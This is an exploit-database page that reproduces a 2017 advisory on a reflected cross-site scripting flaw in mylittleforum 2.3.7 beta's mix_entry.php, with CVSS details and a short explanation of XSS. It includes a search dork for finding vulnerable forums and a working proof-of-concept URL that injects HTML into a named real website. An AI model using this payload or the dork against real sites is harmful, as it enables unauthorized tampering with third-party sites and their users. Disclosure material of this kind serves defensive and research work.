Advertisement






mylittleforum-2.3.7 beta "mix_entry.php" XSS vulnerability

CVE Category Price Severity
N/A CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') N/A High
Author Risk Exploitation Type Date
N/A High Remote 2017-12-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L 0.21 0.61221

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017120237

Below is a copy:

mylittleforum-2.3.7 beta "mix_entry.php" XSS vulnerability
========================================================================
| # Title     : mylittleforum-2.3.7 beta "mix_entry.php" XSS vulnerability
| # Author    : indoushka
| # email     : [email protected]
| # Tested on : windows 8.1 Franais V.(Pro)
| # Version   : 2.3.7
| # Vendor    : https://codeload.github.com/ilosuna/mylittleforum/zip/v2.3.7beta
| # Dork      : powered by my little forum
========================================================================

poc :

Cross site scripting (also referred to as XSS) 
is a vulnerability that allows an attacker 
to send malicious code (usually in the form of Javascript) 
to another user. 
Because a browser cannot know if the script 
should be trusted or not, it will execute the script in the user context allowing 
the attacker to access any cookies or session tokens retained by the browser. 

This vulnerability affects /mix_entry.php
 
Attack details :

Path Fragment input / was set to <marquee><font color=lime size=32>indoushka</font></marquee>
The input is reflected inside a text element.


http://www.israbirding.com/israelbirdsforum/mix_entry.php?category=0&descasc=DESC%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E&id=1629&order=last_answer&page=1

Greetz :   ------ --------  o ------
                                                                       |
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn                   |
                                                                       |
===================== p o   =============================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.